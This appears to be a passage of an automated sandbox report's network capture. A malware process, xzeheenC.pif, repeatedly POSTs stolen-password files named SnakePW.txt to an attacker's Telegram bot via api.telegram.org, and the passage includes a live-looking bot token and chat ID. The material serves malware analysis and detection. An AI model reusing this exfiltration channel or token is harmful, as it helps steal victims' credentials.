                                                                                                        2024-12-18 15:31:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419076,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535888,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.849743149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:29 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1ffbc3b398fe
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:29 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 66 62 63 33 62 33 39 38 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1ffbc3b398feContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:29 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:29 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:29 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419078,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535889,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.849744149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:29 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1faabcbe3ba4
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:29 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 61 61 62 63 62 65 33 62 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1faabcbe3ba4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:30 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 517
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:30 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419080,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535889,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.849745149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:29 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd207e11dc29ac
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:29 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 37 65 31 31 64 63 32 39 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd207e11dc29acContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:30 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419082,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535890,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        33192.168.2.849746149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2015a808a94e
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 31 35 61 38 30 38 61 39 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2015a808a94eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:31 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:31 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:31 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419084,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535891,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        34192.168.2.849747149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fc0c1b966bb
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 63 30 63 31 62 39 36 36 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fc0c1b966bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:32 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419086,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535892,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        35192.168.2.849748149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2090b25629b5
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 39 30 62 32 35 36 32 39 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2090b25629b5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:32 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419088,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535892,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        36192.168.2.849749149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:33 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd202e190e4b21
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:33 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 32 65 31 39 30 65 34 62 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd202e190e4b21Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:33 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:33 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
